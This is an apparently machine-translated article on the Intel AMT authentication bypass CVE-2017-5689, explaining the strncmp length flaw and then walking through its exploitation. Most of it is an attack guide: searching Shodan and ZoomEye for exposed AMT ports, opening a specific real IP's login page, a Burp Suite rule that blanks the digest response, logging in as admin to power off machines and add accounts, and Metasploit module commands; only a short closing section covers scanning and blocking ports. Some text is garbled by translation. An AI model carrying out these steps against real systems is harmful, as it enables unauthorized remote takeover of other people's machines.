Shulou(Shulou.com)06/02 Report--

Login vulnerability Analysis and practice of IntelAMT firmware password Bypass

Byantian365.com simeon

1.1 brief introduction to vulnerabilities

Intel announced the AMT vulnerability (INTEL-SA-00075) on May 1, 2017, but the details of the vulnerability were not disclosed. On May 5, 2017, Tenable researcher Carlos Perez finally discovered and successfully exploited the vulnerability by analyzing the LMS software package.

1. Vulnerability number

Intel firmware password bypasses login vulnerability CVE vulnerability number CVE-2017-5689 Intel AMT firmware can be configured with Intel manageability SKU: Intel active Management Technology (AMT) and Intel Standard manageability (ISM). In other words, you can manage the hardware by installing the LMS software package and provide Web access. Unprivileged network users can obtain system permissions, add administrator accounts, change network settings, restart computers remotely, and so on.

AMT is an out-of-band management tool accessible through the device's wired Ethernet interface network port 16992: it exposes full control of the system to the network, allowing IT personnel and other system administrators to remotely restart, repair, and slightly adjust servers and workstations. It can provide a virtual serial console and (if the correct driver is installed) remote desktop access. A password should be required before obtaining permission, but the vulnerabilities mentioned above mean that * * users can * hardware control panels. Even if a firewall has been set up for AMT access to the system, people or malware on the user's network can still take advantage of this vulnerability to gain access to AMT-managed workstations and servers and further capture the enterprise.

two。 Affected system

Affected hardware versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5 and 11.6:

First generation Core family: 6.2.61.3535

Second generation Core family: 7.1.91.3272

The third generation Core family: 8.1.71.3608

Fourth generation Core family: 9.1.41.3024 and 9.5.61.3012

The fifth generation Core family: 10.0.55.3000

Sixth generation Core family: 11.0.25.3001

Seventh generation Core family: 11.6.27.3264

3. Please * scene

(1) you can power off the server directly.

(2) restart the system and run the specified system by loading the img image file.

(3) modify BIOS directly

(4) manage through KVM

4. Principle of vulnerability exploitation

AMT login management is judged by the response_length value, that is, the key code:

If (strncmp (computed_response,user_response, response_length))

Deny_access ()

This standard function simply compares the response_length bytes of each of the two strings to see if they are the same. The two strings compared are the authentication response (user_response) sent by the login attempt and the response (computed_response) of the service request. If the two match, the password must be correct, so the function returns zero and the code continues to grant access. If the two strings are different, the function returns a non-zero value, which means that the password is wrong, so access is denied. So if an empty string is provided, the length is zero, no bytes are checked, so no bytes are different; as expected, strncmp () returns zero, indicating that the validation was successful. Therefore, an empty response string is considered valid and released, but it is actually invalid, so login can be bypassed by changing all values of response to null.

1.2 vulnerability exploitation restore

1. Search for port number

The vulnerability provides external ports of 16992, 16993 and 623, which can be obtained by searching for "port:16992", "port: 16993" and "port: 623" by search engines such as zoomeye and shodan. In order to collect target information more accurately, you can add the keyword IntelActiveManagement Technology, as shown in figure 1, to search IntelActiveManagement Technology country:China country:China port:16992 directly.

Figure 1 search for servers with ports

two。 Check to see if the web server is running properly

View the records with two square icons in the search results, for example, click directly to open the "118.150.17.193" search results record address "http://118.150.17.193:16992/logon.htm"" as shown in figure 2, the website can function normally.

Figure 2 to see if the AMT service is running properly

3. Modify burpsuite settin

After running burpsuite, click "Proxy"-"Option", create or edit the Request Header entry in "Match andReplace", the match value is response\ 9a-f = "[0-9a-f] +", the value of Replace is "response=", the setting is shown in figure 3, and the intercept switch is set to "Interceptis On" in Intercept.

Figure 3 modify burpsuite settings

4. Log in using admin

Go back to the browser (be sure to set the IE proxy to 127.0.0.1 proxy port 8080), click "Log On" to log in, enter the user name admin, and enter the password as you like.

Figure 4 Login using admin

5. Successfully logged in to the AMT management interface

In the burpsuite Intercept, click "Forward" to release, as shown in figure 5, successfully log in to the AMT management interface, in which you can see the status of the power supply is hibernation, IP address, wireless IP address, system ID and other information, you can also view the system, processor, memory, disk and power supply and other details.

Figure 5 Log in to the AMT administration interface

6. Remotely restart the system

Click "Remote Control" (remote control), as shown in figure 6, you can do regular boot, boot from CD, boot from hard disk, or even power off directly! For important systems, once the power is turned off, the consequences can be imagined!

Fig. 6 remote control system

7. User account management

Click User Accounts, where you can create a new user, change the user password, delete the user, and change the administrator, as shown in figure 7, and set the administrator's permission level. To add a user, the password strength requires at least 8 digits, and the password is composed of letters, upper and lower case, numbers and special characters, as shown in figure 8, otherwise the password cannot be added successfully.

Figure 7 user Management

Figure 8 change password

8. Full TCP port scan of the target IP using Nmap

The results of a full TCP port scan of the target IP using Nmap show that there are 16992, 16994, and 623 ports. As shown in figure 9, it is different from the ports 16992, 16993 and 623 proposed by Tenable.

1.3Using msf on the kali platform

Run msf directly, and then test using the following modules:

Use auxiliary/scanner/http/intel_amt_digest_bypass

Msf auxiliary (intel_amt_digest_bypass) > show actions

Msf auxiliary (intel_amt_digest_bypass) > set ACTION

Msf auxiliary (intel_amt_digest_bypass) > show options

Msf auxiliary (intel_amt_digest_bypass) > run

1.4 Security precautions

1. Scanning

Tenable has updated the latest script in Nessus, and friends who use the scanner can update their Scripts. For other scanners, scan ports 16992, 16993, 16994 and 623 can be added. Once enabled, it can be judged by manual access.

two。 Reinforcement

Close ports 16992, 16993, 16994, and 623 on the firewall and wait for intel to provide an upgrade patch to update the firmware or upgrade.

1.5 reference articles

(1) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689

(2) https://threatpost.com/researcher-baseless-assumptions-exist-about-intel-amt-vulnerability

/ 125390/

(3) https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability

(4) https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf

(5) https://www.rapid7.com/db/modules/auxiliary/scanner/http/intel_amt_digest_bypass

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.